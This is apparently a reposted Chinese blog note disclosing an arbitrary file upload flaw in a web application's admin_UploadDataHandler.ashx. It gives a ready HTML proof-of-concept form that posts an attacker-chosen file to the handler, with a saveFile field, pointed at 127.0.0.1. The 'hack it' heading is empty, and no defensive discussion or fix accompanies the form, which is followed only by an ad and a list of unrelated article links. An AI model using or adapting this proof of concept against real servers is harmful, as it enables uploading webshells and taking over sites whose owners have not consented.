一、漏洞利用点

漏洞文件:admin_UploadDataHandler.ashx 自定义构造上传点

二、hack it

三、POC

<html>
    <body>
        <form action="http://127.0.0.1/admin_UploadDataHandler.ashx" method="POST"enctype="multipart/form-data">
            <input  type="file" name="uploadify" />
            <input  type="text" name="saveFile" value="admin" />
            <input type="submit" name="Upload" value="Submit Query" />
        </form>
    </body>
</html>

转自群友论坛文章wobushou

【推广】免费学中医，健康全家人

原文地址：https://www.cnblogs.com/Akkuman/p/6959308.html

推荐文章
【转】Centos常用系统命令
centos安装wget 及配置
【转】CentOS与Ubuntu命令中的不同之处
读取二进制可执行文件资源中包含的各项版本信息
采用系统提供的加密图形服务计算 MD5 哈希
内存对话框模板封装类
如何控制内嵌网页
可选择的树控件状态改变时的通知消息处理
Microsoft Installer 封装类
TCP 协议高级功能和网卡驱动不兼容导致蓝屏的解决方法
DirectDraw、GdiPlus 和 GDI 的效率比较
在软件中控制 Windows 防火墙
如何创建 CAB 文件和如何从文件、内存和资源中解压缩 CAB 文件
C#下使用opencv，以及有关Emgu CV配置
小用vs2010的单元测试
JSP的基本框架和接受语句
oracle对已有表创建分区
spring 懒加载问题
oracle一些常用总结
在java中的ajax传值时的乱码问题
深入了解Struts2返回JSON数据的原理及具体应用范例
Struts国际化
LeetCode Balanced Binary Tree
LeetCode Triangle
Binary Tree Level Order Traversal
Pow(x,n)
Symmetric Tree
LeetCode Word Search
LeetCode Insert Interval
Maximum Depth of Binary Tree